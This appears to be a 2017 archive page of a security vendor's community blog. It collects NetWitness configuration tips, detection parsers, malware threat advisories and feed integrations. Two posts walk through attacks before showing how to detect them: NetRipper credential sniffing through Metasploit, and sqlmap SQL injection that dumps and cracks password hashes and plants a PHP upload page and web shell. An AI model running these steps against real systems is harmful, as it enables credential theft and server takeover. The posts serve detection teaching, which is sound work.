Skip navigation
All Places > Products > RSA NetWitness Platform > Blog > 2017 > April

By default, Log Decoder metadb size and rollover threshold are 44 GB and 95%. This means that rollover will start automatically if metadb goes beyond around 41.8 GB.


The rollover is so important in order to prevent filesystems fulled.
However, the rollover is not working on defalut settings Log Decoder, because a parameter of "" is 3 GB by default.




The "" indicates that Log Decoder capture will be stopped if remained metadb size goes below the "".

By caluculation, 5% of default metadb is around 2.2GB which is smaller than 3GB of the default "".
This means that the rollover cannot start, because the remained metadb size reached the "" at first and then the capture stops.


In order to do rollover successfully, I experienced two options.


  1. Expanding the metadb (according to "Virtual Host Setup Guide")
  2. Changing the value of rollover threshold from 95%.


The option "b" is the followings; 



<How to change the rollover threshold of metadb>


The following steps change the threshold to 80%.


1,In the Security Analytics menu, select Administration > Services.


2,Select a Log Decoder > System > Explore.


3,The Explore view is displayed.

3-1,Right click on the database in left side fileds.

3-2,Click Properties.

3-3,Choose reconfig in the select box.

3-4,Input the following in Parameters,

type=meta percent=80 update=true


3-5,Click Send.


4,Select Explore > System.


5,The System view is displayed, click Shutdown Service.


6,After start the service, select System > Explore.

6-1,Click database > config.

6-2,Check the value around 35.2 GB and the color of black on /database/config.



As a result, the rollover will start when the remained metadb size goes below around 8.8GB (=20%) which is larger than the default "" (= 3GB).

NetRipper is a post exploitation tool targeting Windows systems which uses API hooking in order to intercept network traffic and encryption related functions from a low privileged user, being able to capture both plain-text traffic and encrypted traffic before encryption/after decryption.


Basically, this can allow the attacker to sniff HTTPS and SSH traffic from his target in clear-text. This can help the attacker acquire additional information, such as usernames and passwords from the user once he authenticates to web applications (over HTTPS) or network devices (over SSH).


In this example we will see how to perform this attack using NetRipper (assuming that the attacker already has a meterpreter shell), and then see how RSA NetWitness Endpoint can help in detecting such attacks.

Throughout the POC, the victim had a fully patched version of Windows as well as an updated antivirus running (McAfee).



We are using:

- Kali Linux as the Attacker's machine

- Windows 7 with McAfee Antivirus as the victim (the same technique would work on Windows 10 as well)




Installation of NetRipper for Metasploit on Kali

Run the following commands on the Kali box to install NetRipper and make it available within Metasploit.

cp netripper.rb /usr/share/metasploit-framework/modules/post/windows/gather/netripper.rb
mkdir /usr/share/metasploit-framework/modules/post/windows/gather/netripper
g++ -Wall netripper.cpp -o netripper
cp netripper /usr/share/metasploit-framework/modules/post/windows/gather/netripper/netripper
cd ../Release
cp DLL.dll /usr/share/metasploit-framework/modules/post/windows/gather/netripper/DLL.dll




Launch the Attack

We will assume that the attacker already has a meterpreter shell.


The attacker can connect to the available session using "session -i 1" and he can then list running processes using "ps"

From here he can identify that firefox.exe and putty.exe are running.

The attacker will now decide to use NetRipper to sniff network traffic from firefox in clear-text, even when HTTPS is used.


He will load NetRipper by using the following command: use post/windows/gather/netripper

He can list the options needed with: show options


The attacker needs to:

- set the session ID to use (session 1 from the list of available sessions): set SESSION 1

- set the process names or process IDs he wants to hook to: set PROCESSNAMES firefox.exe,putty.exe

He can then launch the exploit using: exploit


Now that the hooks are set, NetRipper will sniff the traffic for those processes in clear-text and save the content on the victim's machine, by default under the current user's TEMP folder (can be changed with the DATAPATH option).


The victim will now try to authenticate to a web application over HTTPS. In this example we will use GMail, but it could be anything.



Now the attacker will read the content of the firefox.exe_PR_Write.txt file. Even though the victim is using HTTPS, the attacker is able to see both the username ( and the password (password123) of the victim in clear-text.



The same could be done with Chrome, Putty, SecureCRT, WinSCP, Lync, Outlook ...

It is also not limited to login information, but to anything sent or received by the process.




Detection Using RSA NetWitness Endpoint

Now that we have seen how easily an attacker can sniff encrypted traffic from the user via process hooking, bypassing the victim's antivirus, we will now see how to detect it using RSA NetWitness Endpoint.


In the below screenshot, we can see how RSA NWE detects:

- the hooked process (firefox.exe)

- the hooked module names

- the hooked symbols

- an elevated IIOC Score

- the list IIOCs that have been triggered


In addition, by analyzing the module, we can see references to NetRipper and to the files and folders used by the tool.

Sean Lim has done awesome work to write a lua parser to detect potential IDN/Homograph attacks and has asked me to post this for him ...




In the past couple of days, you’ve probably read about the phishing attack that is “almost impossible to detect”.


Essentially, attackers are replacing ASCII characters in web domains with similar-looking Unicode characters for their phishing websites e.g. www.аррӏе.com which is in fact encoded to in Punycode.


I’ve attached a parser which decodes the Punycode-encoded domains, and flags out an alert when it spots a suspicious homograph (based on a predefined blacklist of Unicode characters). No guarantees at all on the efficiency or reliability, but it seems to work pretty well, and it is just a matter of increasing the blacklist size.


Writes into

risk.suspicious='possible idn homograph attack'


(you can change this in the parser by editing a few lines if you want to write into one of the new analysis.x keys for consistency)




Parser looks at the ratio of blacklisted to non-blacklisted Unicode characters, and fires when it exceeds the 0.75 threshold i.e. if it recognizes more than 75% of the Unicode characters as blacklisted ones, the alert will trigger.

·         Fixed a bug in the Punycode decoding which caused incorrect decoding of characters past the first Unicode codepoint

·         Added a few more homoglyphs


The parser is the higher fidelity method of attempting to detect these potential phishing attacks, a slight more brute force method would be using an application rule with existing packet meta.  Making the assumption that well known tld like com,org and net would be targeted for phishing and hostnames starting with 'xn--' we can create an application rule like the following:


name="possible idn homograph hostname" rule=" contains'xn--' && tld='com','org','net'" alert=analysis.session order=198 type=application

And to help close the loop a context menu item that allows you to right click on hostnames and TLD to see what the original domain might be to allow you to validate the potential impact.

This script grabs the sinkhole_*.txt files from the Maltrail GitHub page and creates a single csv used to import into RSA NetWitness as a recurring feed.  This will allow you to detect ip communication to known sinkholes in the ioc metakey.


From there you can choose to alert on that metakey if required.


script is designed to run from SA server, you can crontab it to grab the latest information on a schedule (then create the recurring schedule to load new versions into RSA NW)


Included a report pack as well as the new 10.6.3 cleartext output for the report engine.



Believe it or not, the RSA Charge 2017 event is only six months away, Oct. 17-19 in Dallas at the Hilton Anatole. Visit the RSA Charge microsite, now open!  And this means, 'Call for Speakers' submissions are now being accepted as well.  



In case you were not able to attend one of the two live RSA Charge 'Call for Speakers' webinars in April, 'What You Need to Know About Submitting Your Speaker's Proposal'  the webinar replay is now available for your listening pleasure. 


To help you get those creative juices flowing, the following 2017 Submission Tracks have been identified for RSA products; for full session descriptions please see attachment:


Security Operations, Identity, Anti-Fraud

Detecting and Responding to the Threats That Matter

Identity Assurance

Reducing Fraud, while Not Reducing Customers

Secrets of the SOC


Governance, Risk and Compliance

Inspiring Everyone to Own Risk

Managing Technology Risk in Your Business

Taking Command of Your Risk Management Journey

Transforming Compliance

RSA Archer Suite Technical

RSA Archer Suite Advanced Technical


It is recommended that you once you listen to the replay, you use the 'offline' form,' available on the microsite as your draft before submitting. You may also have more than one submission. RSA Charge official  'Speaker' Submission Form is also available on the microsite.


Please Note: 'Call for Speakers' closes on May 26.'  

Based on some recent events related to Equation Group, logging commandline history became a more interesting topic for me to investigate.  There were some indicators that were published here that might have been useful to look for if analysts had a way to look at Linux commandline/bash history.


So the question became, how do enterprises log commandline information for all or targeted users or commands much like powershell can be used to get useful windows endpoint information for forensic investigations?

Natively there appeared to be many hacks to get some form of logging via syslog to a SIEM but the consensus appeared to be using Auditd to create rules to log events of interest and forward via syslog.  Still investigating how to get that to work on my demo environment but I took a slight pivot and looked at NetWitness Endpoint to see what information could be extracted from that database to leverage.


Using the post from Chris Thomas as a template to create a similar ODBC connection for Linux machines, a similar event source and ODBC typespec were created to pull linux bash history into NetWitness Logs where you could leverage the native investigation capabilities to look for the indicators in the first link (as well as any others that might be useful).  THe bash history is captured at scan time only (not like windows tracking data) but still gets you some potentially useful information into the SIEM.


This is what we can extract currently for linux endpoint agents:

specifically we are pulling in the client mac, client IP, client hostname, user, command (param)

The commandline parameters are written into the same metakey as the windows tracking data so that eveything is grouped together (with a different device.type = nwe_tracking_linux)




typespec and parser included below, same implementation as the Windows Tracking data.

Lotus Blossom is an adversary group that targets military and government organizations in Southeast Asia [1]. Emissary is one of the malware tools used by the group. The oldest Emissary sample was found in 2009 and the malware family has evolved over time [2]. It is usually delivered through well-crafted documents that exploit unpatched vulnerabilities in Microsoft Office.


This threat advisory discusses the host behavior of one of Emissary variants and how to detect its beaconing activity using RSA NetWitness Logs and Packets.


A dropper loads this Emissary variant from its resources section and writes it to the disk but it doesn’t stop there. It keeps inflating the newly created file by adding junk data to it. The size of the newly created file exceeds 500 MB. In the same directory, it drops a copy of itself and an obfuscated configuration file. Analysis indicates that the configuration file has a unique victim ID and a list of C2 servers.



The dropper proceeds to inject Emissary into the address space of a new Internet Explorer process:



Emissary keeps a log of its activity in clear text:



Emissary collects system information and starts communicating with its primary C2 server as follows:



In the screenshot above, the Cookie field has both the victim machine unique ID as well as its IP address.


An update to the HTTP Lua parser is now available on Live to detect Emissary network activity:



When it detects Emissary traffic, it registers meta to the “Indicators of Compromise” key:



Emissary sample can be found on VirusTotal here, and a delivery document can be found here.


All the IOC from those HTTP sessions were added to the following RSA FirstWatch Live feeds:

  • RSA FirstWatch APT Threat Domains
  • RSA FirstWatch APT Threat IPs

If threat.desc meta key is enabled then you can use the following query:

            threat.desc = ‘apt-emissary-c2’


Thanks go to Bill Motley for contributing to this threat advisory.




MikroTik is a Latvian company which was founded in 1996 to develop routers and wireless ISP systems. MikroTik provides hardware and software for Internet connectivity in most of the countries around the world. You can read more about Mikrotik at or their product line at


Sample log events:

Apr 11 12:14:15 router %MIKROTIKFW: mangle-pre prerouting: in:bridge out:(none), src-mac 00:0c:29:58:2d:aa, proto TCP (ACK),>, NAT (>>, len 52

In order to configure the parser, you need to add a log-prefix to all messages sent, setup a logging action (destination of where events need to be sent) and finally configure which topics get associated with the logging action.


Mikrotik Syslog Configuration:
/system logging action set 3 bsd-syslog=yes remote=LOG.DECODER.IP.HERE syslog-facility=syslog syslog-severity=notice syslog-time-format=iso8601
/system logging add action=remote prefix=%MIKROTIKFW topics=firewall


For more information on configuring logging within RouterOS, please refer to the Mikrotik WIKI (Manual:System/Log - MikroTik Wiki).


Do not change the prefix. The attached parser requires "%MIKROTIKFW"!!



An SQL Injection attack is not only limited to dumping a database, but can also allow the attacker to upload files to the remote server and consequently gain remote access via a WebShell.

WebShells can receive commands from the attackers mainly using 2 methods:

  • based on GET requests, which can easily be detected through logs and SIEM solutions as the commands are visible in the URL
  • based on POST, which is a bit more stealthy as the commands are submitted in the payload and therefore not part of the logs


We will see how to:

  • use sqlmap to perform an SQL Injection attack
  • dump the database using sqlmap
  • use sqlmap to automatically provide WebShell access based on GET requests
  • use sqlmap to upload a custom and more advanced WebShell (b374k) which relies on POST

To test the SQL Injections, we will use the DVWA (Damn Vulnerable Web Application), which is a web application purposely built with vulnerabilities and weaknesses for pen-testing.


Then we will see how the RSA NetWitness Suite can help in identifying SQL Injections and WebShells (whether using POST or GET).



Performing the SQL Injection Attack

We first need to access the web application, in my case, it is located at


To access the internal pages (which contains the vulnerable page), we first need to login. In a real life scenario, the vulnerability might not require authentication, or, the attacker could have gotten access to a valid user account through a phishing attack or brute-forcing. In our case, we will consider that we already have an account, admin/password.

Once logged in, we will go to the page which is vulnerable to SQL Injections. Again, in our case, we already know which page it is. Typically we could have use a web application vulnerability scanner to crawl the website and look for weaknesses.


To perform the attack, we will need 2 things:

  • The URL containing the parameters that need to be tested for vulnerabilities
  • The authentication cookie, as we need to be authenticated to be able to access the page, and therefore sqlmap will need to have access to reach the page


To get the cookie value, in Chrome,  it can be found in "Inspect --> Application --> Cookies"


We will now use this is sqlmap to test the page for SQL Injection vulnerabilities.

sqlmap -u "" --cookie="PHPSESSID=vjke7qnd0h71a92c7vambk0fh1;security=low"

sqlmap will try to identify the type of database as well as any parameter within the page vulnerable to SQL Injections. In our case, it identified that the "id" parameter is vulnerable and that the back-end database is MySQL.


We will now add the "--dbs" argument at the end of the command to list the available databases on the web server.

sqlmap -u "" --cookie="PHPSESSID=vjke7qnd0h71a92c7vambk0fh1;security=low" --dbs


sqlmap outputs the available databases. We want to look at the tables available under the "dvwa" database. To do that, we will replace "--dbs" with "-D dvwa --tables" to specifically list the tables of that database.

sqlmap -u "" --cookie="PHPSESSID=vjke7qnd0h71a92c7vambk0fh1;security=low" -D dvwa --tables


sqlmap outputs the avialble tables. One of them is the "users" tables. We now want to output the columns of that table. To do that, we will replace "--tables" with "-T users --columns"

sqlmap -u "" --cookie="PHPSESSID=vjke7qnd0h71a92c7vambk0fh1;security=low" -D dvwa -T users --columns


We can see there are 2 columns of interest, "user" and "password". To dump the content of these tables, we will replace "--columns" with "-C user,password --dump"

sqlmap -u "" --cookie="PHPSESSID=vjke7qnd0h71a92c7vambk0fh1;security=low" -D dvwa -T users -C user,password --dump


sqlmap provides us with a list of usernames and password hashes. We can also see that sqlmap provides the option to store the hashes to try and crack them using a dictionary attack. We will answer "Y" to that and we will use the default dictionary.


sqlmap now shows the usernames with their respective clear-text passwords based on the dictionary attack.

This shows how sqlmap can be used to dump the content of a database. But sqlmap also provides the option to get shell access (via a WebShell).





Gaining WebShell Access with sqlmap

Using the same command structure, instead of listing databases, we will provide the "--os-shell" argument. This will make sqlmap upload a simple WebShell to the web server and interact with.

sqlmap -u "" --cookie="PHPSESSID=vjke7qnd0h71a92c7vambk0fh1;security=low" --os-shell


sqlmap will ask for some information regarding the language used by the web server. In our case it is PHP, so it knows to upload a PHP WebShell. We will also upload it to the default location (/xampp/htdocs/). We are provided with an interactive shell from which we can send commands and get the output back.


The problem with this type of WebShell is that it's very basic and uses GET requests, which can be easily detected using logs and SIEM solutions.

Next we will look how to upload our own files using sqlmap (instead of the default WebShell provided by sqlmap), such as the b374k WebShell.




Uploading Custom Files and WebShells using sqlmap

sqlmap allows to download and upload custom files. We will therefore use the "--file-write" and "--file-dest" parameters to upload our own files.

We will start by uploading a PHP upload page, from which we will be able to upload any file we want to the web server.

The following is the "upload.php" file:


$path_name = pathinfo($_SERVER['PHP_SELF']);
$this_script = $path_name['basename'];

<form enctype="multipart/form-data" action="<?php echo $_SERVER['PHP_SELF']; ?>" method="POST">
File: <input name="file" type="file" /><br />
<input type="submit" value="Upload" /></form>


if (!empty($_FILES["file"]))
if ($_FILES["file"]["error"] > 0)
{echo "Error: " . $_FILES["file"]["error"] . "<br>";}
{echo "Stored file:".$_FILES["file"]["name"]."<br/>Size:".($_FILES["file"]["size"]/1024)." kB<br/>";

// open this directory
$myDirectory = opendir(".");
// get each entry
while($entryName = readdir($myDirectory)) {$dirArray[] = $entryName;} closedir($myDirectory);
$indexCount = count($dirArray);
echo "$indexCount files<br/>";

echo "<TABLE border=1 cellpadding=5 cellspacing=0 class=whitelinks><TR><TH>Filename</TH><th>Filetype</th><th>Filesize</th></TR>\n";

for($index=0; $index < $indexCount; $index++)
if (substr("$dirArray[$index]", 0, 1) != ".")
echo "<TR>
<td><a href=\"$dirArray[$index]\">$dirArray[$index]</a></td>
echo "</TABLE>";


Once we upload this file, we will be able to access it through a browser and use it to upload our WebShell.

To upload the "upload.php" file using sqlmap, we will use the following command:

sqlmap -u "" --cookie="PHPSESSID=vjke7qnd0h71a92c7vambk0fh1;security=low" --file-dest="/xampp/htdocs/upload.php" --file-write="~/Desktop/upload.php"

In the above command, "/xampp/htdocs/upload.php" is the location where to write the file on the remote web server, and the "~/Desktop/upload.php" is the location of the WebShell on the local machine of the attacker.


Once uploaded, we can then access the upload page from a browser at the "" URL, from where we can upload the "b374k.php" WebShell (or any other file as well).


Once uploaded, we can then access the WebShell either by clicking on the filename in the list, or by browsing to

We now have access to a more advanced WebShell which allows us to:


Browse the file system, download files, upload files ...


List running processes with the option to kill them.


Or have an interactive shell from where to execute commands.


And all of it from an easy to use, user friendly graphic interface.

And most importantly, using POST requests instead of GET, which allows the specific commands executed not to be detected by the web server logs.






Now that we have seen how to perform this attack, here are some ways to detect the different steps using the RSA NetWitness Suite.


Using RSA NetWitness Packets, it is possible to detect SQL Injection attempts, whether the tool is abusing parameters in the URL (GET) or from within forms (POST), as the whole payload is captured and analyzed, as opposed to only the URL. In the below example we can see that RSA NetWitness Packets was able to detect the SQL Injection.



Then, it is possible to identify the the actual WebShell file that is being used, as well as the commands executed by the attacker. RSA NetWitness Packets is also able to identify that the web session contains CLI commands, which is an indicator of WebShell activity.



Having the entire network payload, it is also possible to reconstruct the WebShell session and see the commands and outputs, providing insight into what the attacker was actually able to get.



Using RSA NetWitness Endpoint, we would also be able to see the web server service running CLI commands, which is a suspicious behavior and typical of WebShells. The tracking section would allow us to see the exact commands executed.


Using both packets and endpoint, we would be able to identify the SQL Injection, the WebShell files used as part of the attack and the exact commands executed by the attacker, providing the full scope of the attack to the analyst. 

Eric Partington

Reporting on IMDB

Posted by Eric Partington Employee Apr 6, 2017

Recently RSA NetWitness (NW) added the ability to report on the IMDB component of the platform.  Based on some recent questions it seemed useful to create a few template rules and reports that could be used to create a starter pack for reporting on IMDB data.


RSA IMDB reporting syntax


Included at the bottom is the rule and report pack that cover a few scenarios that should get you started reporting on data that you might want to see.


Some things that I have found out during this development.

  • in the alerts table the alert.host_summary is visible as an option, but the alert.user_summary is not visible.  You can add alert.user_summary to report on that data manually and it works for me ( - Bug reported for that to fix.
  • in the incidents table the 'name' of the incident is not visible as a usable meta value.  if you add 'name' manually you can add the incident name to the report. Bug reported for that to fix as well.


S you can create rules that provide data like this for alerts:

Like this for incidents

or pretty close to this


The rules in the included pack


This is not an RSA officially supported integration.


This script will sync the incidents of a specific RSA NetWitness user to his Todoist account. He can then leverage the Todoist integrations with the Amazon Echo, Google Home, IFTTT …

It can be setup for multiple users using different Todoist account (add one per line in the config file).



The open incidents of a user, as well as their severity will be synced with Todoist.

Whenever an incident is removed from the user’s queue in NW (either closed, or moved to another analyst), it will be set as closed on Todoist. Closing an incident on Todoist will not close it on NW IM, it will just re-appear the next time a synchronization is triggered.






What you will need

You will need the API Token from your Todoist Account (Settings --> Integration --> API Token)



You will need the Project Number from Todoist. This will define to which project the incidents will be added to. By default it should be on the Inbox (if you want it to work with the Amazon Echo for example). From your browser, go to Todoist, click on Inbox and grab the ID from the URL (do not take “2F”). If you want to sync with another project, then click on that project and grab the ID.

If you setup this script on a Todoist project that already has items, the existing items will get deleted.


You will also need the username on RSA NetWitness.





Edit the nwim2todoist.conf file and add a line for each user you wish to do the synchronization for.

There shouldn’t be any empty lines or extra spaces in the file.

The following is the format: <nw_username>,<todoist_api_token>,<todoist_project_id>



Put both and nwim2todoist.conf in the same folder on the ESA Server

Make sure the ESA server has access to

Edit nwim2todoist.conf to have a line for each user for who to sync his associated incidents with his Todoist account





By default, the script will create an item on Todosit for each Incident called <INCIDENT ID> - <INCIDENT NAME>

If for privacy reasons you don’t want to sync the Incident Name and just have the Incident ID, then edit the file and change hide_name from 0 to 1.


Example with Privacy enabled:




Run the Script

Simply execute: python

Create a cron job to execute regularly.





Example without Privacy:



Example with Privacy:




credit to Ian Cuthbertson

Ursnif, also known as Gozi and ISFB, is a banking Trojan that primarily targets English-speaking countries. It was first discovered in 2007 and in 2010 its source code was unintentionally leaked [1]; which provided the basis for much of the legacy Ursnif variant diagnosis and detection. Dreambot is a newer variant (ca 2016) of Ursnif that incorporates capabilities such as Tor communications and peer-to-peer functionality [2].


Dreambot malware has been observed to spread via many of the conventional crimeware avenues to include exploit kits, e-mail attachments and links [2] [3]. To evade automated malware analysis, Dreambot uses password protected macro attachments and also delays for 250 seconds prior to downloading the malware [4].


This threat advisory discusses how to detect Dreambot beaconing activity using RSA NetWitness Logs & Packets.


A system infected with Dreambot reaches out to its command and control server as follows:



The behavior is consistent across many Dreambot samples:



Then a Tor client is retrieved:




The check-in is different for other Dreambot variants:




Assuming that the appropriate meta keys are enabled, the following queries can be used to detect Dreambot network activity:

  • Detect the check-in activity you can use:

    action = 'get' && filename = '.avi' && extension = 'avi' && directory contains '/images/' && direction = 'outbound'

    action = 'post' && directory begins '/images/' && query begins 'filename=' && extension = 'bin' && direction='outbound'

  • Detect the Tor client retrieval you can use:

    action = 'get' && filename = 'test32.dll',' t32.dll', ' t64.dll' && extension = 'dll' && directory contains '/tor/' && direction = 'outbound'


Dreambot samples can be found on VirusTotal here and here, and on Payload Security here and here.


All the IOCs from those sessions were added to the following feeds on Live:

  • RSA FirstWatch Command and Control Domains
  • RSA FirstWatch Command and Control IPs

To find those IOCs using RSA NetWitness, please refer to this post.


In addition, the following Application Rule is now available on Live:



Below is a screenshot of the Application Rule detecting Dreambot traffic:




Thanks go to Rajas Save for contributing to this threat advisory.



  3. RIG EK at Drops Dreambot – MALWARE BREAKDOWN 
  4. New Password Protected Macro Malware evades Sandbox and Infects the victims with Ursnif Malware !! - Cysinfo 

I'm sure you know that RSA Netwitness for Logs and Packets includes the ability to register for a Cisco AMP ThreatGrid API Key through RSA's partnership with Cisco AMP ThreatGrid. You can use this API key to enable sandbox analysis with the RSA NetWitness Malware Analysis service. If you haven't done so already, check out the documentation here MA: (Optional) Register for a ThreatGrid API Key  for details on how to register. 


What you may not know, is that you can also use that API key to download Cisco AMP ThreatGrid's Intelligence Feeds. Every hour or so, Cisco AMP ThreatGrid takes the artefacts from their sandbox analysis and create 15 Intelligence Feeds - we can use 12 of them directly in RSA NetWitness for Logs and Packets. It's easy to set these up as feeds using the Custom Feed Wizard in RSA NetWitness Logs and Packets.


Once you have your Cisco AMP ThreatGrid API key and login details, login to the portal, and click on the Help icon to access the Feeds Documentation. It will be in the middle of the page:



Follow the Cisco AMP ThreatGrid documentation to see which feeds make sense for your environment. At the time of writing, there are 15 feeds available. The feeds that end with -dns are feeds that match on a DNS lookup for a host - these are the feeds that we will integrate with RSA NetWitness for Logs and Packets:



The format for the URL to retrieve the feed is quite simple:

Once you have your API key ready, and the list of feeds you want to integrate, head to the RSA NetWitness Custom Feed Wizard under Live --> Feeds, where you will see any existing custom feeds:


Click on the + to create a new custom feed:

Then enter the details for your feed. Here is a list of all the URL's for all the feeds - just put your key in at the end instead of 1234567890 ...


Make sure you select Recurring as the "Feed Task Type" - this will let you download the feed directly from Cisco AMP ThreatGrid - and set the "Recur Every" variable to 1 hour for fresh feeds:



Click the Verify button to make sure RSA NetWitness can connect to the URL and get the green tick:

Next, choose which of your Decoders to apply this feed to. It will work for both Packet and Log Decoders (but it's always a good idea to test first before rolling into production!):



Next, we get to define how to use the data in the feed. This will be a Non-IP feed (we want to match on the hostname in the feed), the Index will be in column 2 (the hostname), and the Callback Key (the key we want to match against) will be



The other columns can be mapped to whatever meta keys you want to use in your environment. For my example, I used:

  • threat.desc - Threat Description for the first column as I often use the Threat Keys (threat.source, threat.desc, for reviewing data
  • <key>
  • alias.ip - this is the IP address that the hostname resolved to when the feed was created. For a more advanced implementation of this feed you may want to investigate how to create a feed with multiple indexes
  • - the date of the feed
  • tg.analysis - a link to the Cisco AMP ThreatGrid portal for analysis of the hostname
  • tg.sample - a link to the Cisco AMP ThreatGrid portal for a malware sample
  • tg.md5 - MD5 hash
  • tg.sha256 - SHA256 hash
  • tg.sha1 - SHA1 hash

(None of these new keys need to be indexed (unless you want to) so there is no need to modify the index-concentrator-custom.xml files).

Next, review your settings:


When finished, confirm that your feed ran:


Repeat this process for each of the feeds that you want to integrate:


The last (optional) step, is to create an Application Rule that will label the Threat Source that this feed comes from. We can simply check for the tg.analysis key to see if any of our feeds have triggered:


Rule Name - Cisco AMP ThreatGrid

Condition - tg.analysis exists

Alert on - threat.source


Now we can simply search for threat.source = 'cisco amp threatgrid' to find any hits.


Happy Hunting!

Filter Blog

By date: By tag: